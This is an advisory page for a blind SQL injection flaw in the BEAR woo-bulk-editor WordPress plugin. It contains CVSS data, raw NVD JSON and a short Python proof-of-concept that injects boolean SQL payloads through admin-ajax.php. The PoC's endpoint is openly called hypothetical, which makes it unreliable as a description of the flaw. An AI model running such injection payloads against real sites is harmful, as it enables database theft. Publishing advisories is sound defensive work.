Security Vulnerability Report
中文
CVE-2026-45213 CVSS 7.6 HIGH

CVE-2026-45213

Published: 2026-05-12 11:16:21
Last Modified: 2026-05-12 14:03:53

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 BEAR woo-bulk-editor allows Blind SQL Injection.This issue affects BEAR: from n/a through <= 1.1.7.1.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

BEAR woo-bulk-editor <= 1.1.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-45213 - Blind SQL Injection in BEAR woo-bulk-editor # This script demonstrates a boolean-based blind injection concept. TARGET_URL = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Requires authenticated session (High Privilege needed per CVSS:3.1/PR:H) COOKIES = { "wordpress_logged_in_hash": "your_admin_cookie_here" } def check_sqli(payload): data = { "action": "bulk_editor_action", # Hypothetical action endpoint "id": f"1' AND {payload}-- -" } response = requests.post(TARGET_URL, data=data, cookies=COOKIES) # Analyze response to infer True/False condition return "expected_content" in response.text # Example payload to check database version if check_sqli("(SELECT SUBSTRING(VERSION(), 1, 1)) = '5'"): print("[+] Vulnerability confirmed: Database version starts with 5") else: print("[-] Condition false")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45213", "sourceIdentifier": "[email protected]", "published": "2026-05-12T11:16:20.733", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 BEAR woo-bulk-editor allows Blind SQL Injection.This issue affects BEAR: from n/a through <= 1.1.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-bulk-editor/vulnerability/wordpress-bear-plugin-1-1-7-1-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}